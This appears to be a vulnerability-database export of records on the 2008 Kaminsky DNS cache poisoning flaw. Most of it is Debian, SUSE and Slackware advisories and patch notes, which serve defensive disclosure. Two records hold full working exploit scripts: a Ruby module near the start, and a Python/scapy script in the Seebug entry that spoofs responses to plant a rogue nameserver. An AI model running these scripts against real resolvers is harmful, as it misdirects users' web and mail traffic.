and\r\nanswer2.header.anCount >= 1\r\n nsrec = {:name => rr0.nsdname, :addr => rr1.address}\r\n barbs << nsrec\r\n print_status " #{rr0.nsdname} is authoritative for\r\n#{domain}, adding to list of nameservers to spoof as"\r\n end\r\n end\r\n end \r\n end\r\n\r\n if barbs.length == 0\r\n print_status( "No DNS servers found.")\r\n srv_sock.close\r\n disconnect_ip\r\n return\r\n end\r\n\r\n # Flood the target with queries and spoofed responses, one will eventually hit\r\n queries = 0\r\n responses = 0\r\n\r\n connect_ip if not ip_sock\r\n\r\n print_status( "Attempting to inject a poison record for #{hostname} into\r\n#{target}:#{sport}...")\r\n\r\n while true\r\n randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize\r\nthe hostname\r\n\r\n # Send spoofed query\r\n req = Resolv::DNS::Message.new\r\n req.id = rand(2**16)\r\n req.add_question(randhost, Resolv::DNS::Resource::IN::A)\r\n\r\n req.rd = 1\r\n\r\n buff = (\r\n Scruby::IP.new(\r\n #:src => barbs[0][:addr].to_s,\r\n :src => source,\r\n :dst => target,\r\n :proto => 17\r\n )/Scruby::UDP.new(\r\n :sport => (rand((2**16)-1024)+1024).to_i,\r\n :dport => 53\r\n )/req.encode\r\n ).to_net\r\n ip_sock.sendto(buff, target)\r\n queries += 1\r\n \r\n # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\r\n req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n req.add_authority(domain, ttl,\r\nResolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))\r\n req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n req.qr = 1\r\n req.ra = 1\r\n\r\n xidbase.upto(xidbase+xids-1) do |id|\r\n req.id = id\r\n barbs.each do |barb|\r\n buff = (\r\n Scruby::IP.new(\r\n #:src => barbs[i][:addr].to_s,\r\n :src => barb[:addr].to_s,\r\n :dst => target,\r\n :proto => 17\r\n )/Scruby::UDP.new(\r\n :sport => 53,\r\n :dport => sport.to_i\r\n )/req.encode\r\n ).to_net\r\n ip_sock.sendto(buff, target)\r\n responses += 1\r\n end\r\n end\r\n\r\n # status 
update\r\n if queries % 1000 == 0\r\n print_status("Sent #{queries} queries and #{responses} spoofed\r\nresponses...")\r\n end\r\n\r\n # every so often, check and see if the target is poisoned...\r\n if queries % 250 == 0 \r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n query.rd = 0\r\n \r\n srv_sock.put(query.encode)\r\n answer, addr = srv_sock.recvfrom()\r\n\r\n if answer and answer.length > 0\r\n answer = Resolv::DNS::Message.decode(answer)\r\n answer.each_answer do |name, ttl, data|\r\n if((name.to_s + ".") == hostname and\r\ndata.address.to_s == address)\r\n print_status("Poisoning successful\r\nafter #{queries} attempts: #{name} == #{address}")\r\n disconnect_ip\r\n return\r\n end\r\n end\r\n end\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception => e\r\n print_status("Error querying the DNS name: #{e.class} #{e}\r\n#{e.backtrace}")\r\n end\r\n end\r\n\r\n end\r\n\r\n end\r\n\r\nend\r\nend\r\n\r\n\r\n-- \r\nI)ruid, C²ISSP\r\ndruid@caughq.org\r\nhttp://druid.caughq.org", "edition": 1, "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SECURITYVULNS:DOC:20222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20222", "title": "CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1605-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 08, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : glibc\r\nVulnerability : DNS cache poisoning\r\nProblem type : 
remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1447\r\nCERT advisory : VU#800113\r\n\r\n\r\nDan Kaminsky discovered that properties inherent to the DNS protocol\r\nlead to practical DNS spoofing and cache poisoning attacks. Among\r\nother things, successful attacks can lead to misdirected web traffic\r\nand email rerouting.\r\n\r\nAt this time, it is not possible to implement the recommended\r\ncountermeasures in the GNU libc stub resolver. The following\r\nworkarounds are available:\r\n\r\n1. Install a local BIND 9 resolver on the host, possibly in\r\nforward-only mode. BIND 9 will then use source port randomization\r\nwhen sending queries over the network. (Other caching resolvers can\r\nbe used instead.)\r\n\r\n2. Rely on IP address spoofing protection if available. Successful\r\nattacks must spoof the address of one of the resolvers, which may not\r\nbe possible if the network is guarded properly against IP spoofing\r\nattacks (both from internal and external sources).\r\n\r\nThis DSA will be updated when patches for hardening the stub resolver\r\nare available.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "edition": 1, 
"modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20145", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20145", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T21:49:45", "description": "BUGTRAQ ID: 27283\r\nCVE(CAN) ID: CVE-2008-0122\r\n\r\nFreeBSD is a freely usable open-source Unix-like system that runs on the Intel platform.\r\n\r\nA single-byte overflow in FreeBSD's inet_network() function can cause memory corruption with certain inputs; a local attacker may exploit this vulnerability to elevate privileges or cause a denial of service.\r\n\r\nIf a program passes untrusted data to inet_network(), an attacker can cause a region of memory to be overwritten with user-defined data by passing specially crafted input to inet_network(). Depending on the region of memory overwritten, the attacker can cause a denial of service or execute code in the program using inet_network().\r\n\n\nFreeBSD FreeBSD 7.0\r\nFreeBSD FreeBSD 6.3\r\nFreeBSD FreeBSD 6.2\n Vendor patch:\r\n\r\nFreeBSD\r\n-------\r\nFreeBSD has released a security advisory (FreeBSD-SA-08:02) and corresponding patches for this issue:\r\nFreeBSD-SA-08:02: inet_network() buffer overflow\r\nLink: <a href=ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-08:02.libc.asc 
target=_blank>ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-08:02.libc.asc</a>\r\n\r\nPatch download:\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade the vulnerable system to 7.0-PRERELEASE or 6-STABLE, or to the RELENG_7_0,\r\nRELENG_6_3 or RELENG_6_2 security branch dated after the correction date.\r\n\r\n2) To patch your present system:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.0, 6.3 or 6.2 systems.\r\n\r\na) Download the relevant patch from the location below and verify the accompanying PGP signature using your PGP utility.\r\n\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:02/libc.patch target=_blank>http://security.FreeBSD.org/patches/SA-08:02/libc.patch</a>\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:02/libc.patch.asc target=_blank>http://security.FreeBSD.org/patches/SA-08:02/libc.patch.asc</a>\r\n\r\nb) Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch", "published": "2008-01-23T00:00:00", "title": "FreeBSD inet_network() function single-byte overflow vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0122"], "modified": "2008-01-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2853", "id": "SSV:2853", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T21:33:51", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17308", "id": 
"SSV:17308", "sourceData": "\n from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = "X.X.X.X"\n# Vulnerable recursive DNS server\ntargetdns = "X.X.X.X"\n# Authoritative NS for the target domain\nsrcdns = ["X.X.X.X"]\n\n# Domain to play with\ndummydomain = ""\nbasedomain = ".example.com."\n# sub-domain to claim authority on\ndomain = "sub.example.com."\n# Spoofed authoritative DNS for the sub-domain\nspoof="ns.evil.com."\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, 
nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = "a" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint "Successfully poisonned our target with a dummy record !!"\n\t\t\tbreak\n\texcept:\n\t\tprint "Poisonning failed"\n\n# milw0rm.com [2008-07-24]\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17308"}], "suse": [{"lastseen": 
"2016-09-04T11:48:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "The bind daemon is responsible for resolving hostnames in IP addresses and vice versa. The new version of bind uses a random transaction-ID (TRXID) and a random UDP source-port for DNS queries to address DNS cache poisoning attacks possible because of the \"birthday paradox\" and an attack discovered by Dan Kaminsky. Unfortunately we do not have details about Kaminsky's attack and have to trust the statement that a random UDP source-port is sufficient to stop it. DNS servers that do not support recursive queries or do not use a cache (authoritative only servers) are not vulnerable too. Update packages of bind9 for SLES8 will be available soon. The glibc stub resolver is known to be vulnerable too and we will publish updates as soon as possible. Note, a local attacker can always sniff DNS queries and generate spoofed responses easily. If you use the UDP source-port number of the DNS server in your firewall configuration, for example to let DNS queries through your packetfilter, then you have to take steps to adapt your filter rules to the new behavior of the DNS server.\n#### Solution\nTo protect your infrastructure from cache poisoning attacks you should provide two DNS servers. One that is authoritative only and accessible from the Internet to resolve queries for your local systems that are available over the Internet. The other system (caching) is not accessible over the Internet and can be used by internal clients to recursively lookup names and addresses. But we encourage you to install the bind update as soon as possible too. If you use the latest update of pdns-recursor you are not vulnerable to this attack. 
For the glibc stub resolver bug you can install a local secure DNS forwarder on your machine or make a DNS forwarder available for a protected network.", "edition": 1, "modified": "2008-07-11T09:57:52", "published": "2008-07-11T09:57:52", "id": "SUSE-SA:2008:033", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00003.html", "title": "DNS cache poisoning in bind", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz:\n Upgraded to bind-9.4.2-P1.\n This upgrade addresses a security flaw known as the CERT VU#800113 DNS Cache\n Poisoning Issue. This is the summary of the problem from the BIND site:\n \"A weakness in the DNS protocol may enable the poisoning of caching\n recursive resolvers with spoofed data. DNSSEC is the only full solution.\n New versions of BIND provide increased resilience to the attack.\"\n It is suggested that sites that run BIND upgrade to one of the new packages\n in order to reduce their exposure to DNS cache poisoning attacks.\n For more information, see:\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. 
This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.4.2_P1-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n
> upgradepkg bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nThen, restart the nameserver:\n > /etc/rc.d/rc.bind restart", "modified": "2008-07-10T04:29:01", "published": "2008-07-10T04:29:01", "id": "SSA-2008-191-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\n\nMore details about the issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz:\n Upgraded to ruby-1.8.6-p287.\n This fixes several bugs in the previous Ruby update, including a security\n issue where the DNS resolver did not randomize the source port and\n transaction id 
sufficiently.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n68f319999719565f3f05acf61e791f92 ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n967059ae6d9a3a3ea609472e4f3c3903 ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbc821c4e4eee3608e1c5e2e30238b450 ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-1.8.6_p287-i486-1_slack12.1.tgz", "modified": "2008-11-29T21:37:03", "published": "2008-11-29T21:37:03", "id": "SSA-2008-334-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.371754", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:28:32", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- 
------------------------------------------------------------------------\nDebian Security Advisory DSA-1617-1 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nJuly 25, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : refpolicy\nVulnerability : incompatible policy\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nDebian Bug : 490271\n\nIn DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate\nthe threat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard 'domain' port (53). The incompatibility affects both\nthe 'targeted' and 'strict' policy packages supplied by this version\nof refpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. When installed, the\nupdated packages will attempt to update the bind policy module on\nsystems where it had been previously loaded and where the previous\nversion of refpolicy was 0.0.20061018-5 or below.\n\nBecause the Debian refpolicy packages are not yet designed with\npolicy module upgradeability in mind, and because SELinux-enabled\nDebian systems often have some degree of site-specific policy\ncustomization, it is difficult to assure that the new bind policy can\nbe successfully upgraded. To this end, the package upgrade will not\nabort if the bind policy update fails. The new policy module can be\nfound at /usr/share/selinux/refpolicy-targeted/bind.pp after\ninstallation. 
Administrators wishing to use the bind service policy\ncan reconcile any policy incompatibilities and install the upgrade\nmanually thereafter. A more detailed discussion of the corrective\nprocedure may be found here:\n\n http://wiki.debian.org/SELinux/Issues/BindPortRandomization\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.0.20061018-5.1+etch1. The unstable distribution (sid) is\nnot affected, as subsequent refpolicy releases have incorporated an\nanalogous change.\n\nWe recommend that you upgrade your refpolicy packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n
These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-07-25T06:29:42", "published": "2008-07-25T06:29:42", "id": "DEBIAN:DSA-1617-1:2477C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00201.html", "title": "[SECURITY] [DSA 1617-1] New refpolicy packages fix incompatible policy", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-11-11T13:19:47", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1603-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- 
------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's BIND 9 packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nNote that this security update changes BIND network behavior in a\nfundamental way, and the following steps are recommended to ensure a\nsmooth upgrade.\n\n\n1. Make sure that your network configuration is compatible with source\nport randomization. If you guard your resolver with a stateless packet\nfilter, you may need to make sure that no non-DNS services listen on\nthe 1024--65535 UDP port range and open it at the packet filter. For\ninstance, packet filters based on etch's Linux 2.6.18 kernel only\nsupport stateless filtering of IPv6 packets, and therefore pose this\nadditional difficulty. (If you use IPv4 with iptables and ESTABLISHED\nrules, networking changes are likely not required.)\n\n2. Install the BIND 9 upgrade, using "apt-get update" followed by\n"apt-get install bind9". Verify that the named process has been\nrestarted and answers recursive queries. (If all queries result in\ntimeouts, this indicates that networking changes are necessary; see the\nfirst step.)\n\n3. Verify that source port randomization is active. 
Check that the\n/var/log/daemon.log file does not contain messages of the following\nform\n\n named[6106]: /etc/bind/named.conf.options:28: using specific\n query-source port suppresses port randomization and can be insecure.\n\nright after the "listening on IPv6 interface" and "listening on IPv4\ninterface" messages logged by BIND upon startup. If these messages are\npresent, you should remove the indicated lines from the configuration,\nor replace the port numbers contained within them with "*" sign (e.g.,\nreplace "port 53" with "port *").\n\nFor additional certainty, use tcpdump or some other network monitoring\ntool to check for varying UDP source ports. If there is a NAT device\nin front of your resolver, make sure that it does not defeat the\neffect of source port randomization.\n\n4. If you cannot activate source port randomization, consider\nconfiguring BIND 9 to forward queries to a resolver which can, possibly\nover a VPN such as OpenVPN to create the necessary trusted network link.\n(Use BIND's forward-only mode in this case.)\n\n\nOther caching resolvers distributed by Debian (PowerDNS, MaraDNS,\nUnbound) already employ source port randomization, and no updated\npackages are needed. BIND 9.5 up to and including version\n1:9.5.0.dfsg-4 only implements a weak form of source port\nrandomization and needs to be updated as well. 
For information on\nBIND 8, see DSA-1604-1, and for the status of the libc stub resolver,\nsee DSA-1605-1.\n\nThe updated bind9 packages contain changes originally scheduled for\nthe next stable point release, including the changed IP address of\nL.ROOT-SERVERS.NET (Debian bug #449148).\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 9.3.4-2etch3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your bind9 package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\n
http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 1167832 75f402f7bf328da5deee364f4266558d\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96204 57ec688c7f24161e347054dc93fbd757\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96170 77d5b9189a05f2b3dca7901bff6e56df\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 301276 dddf71278c1f4afbbc49019248f4328e\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 109288 8fd2b3005fcf95e3616ec8a77b3ad322\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 183310 b9eb85b58aaf29a3106d16410c0d379a\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 206830 b286690dde8d1412c2de3fa99f7d3c5b\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 114234 23a30b0e26db0210a1be48c4d44b6d7f\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 331864 7c3fab929f1e29873ecfc7c7c4b52ddc\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 116656 8abeeeb22e800f63e4b30e0c2dd974e0\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 1137342 820a17acdc24ef1dd0c1db7b8e6fc470\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 233948 635487d4e6ea4d15704bb14b8cf9236c\n 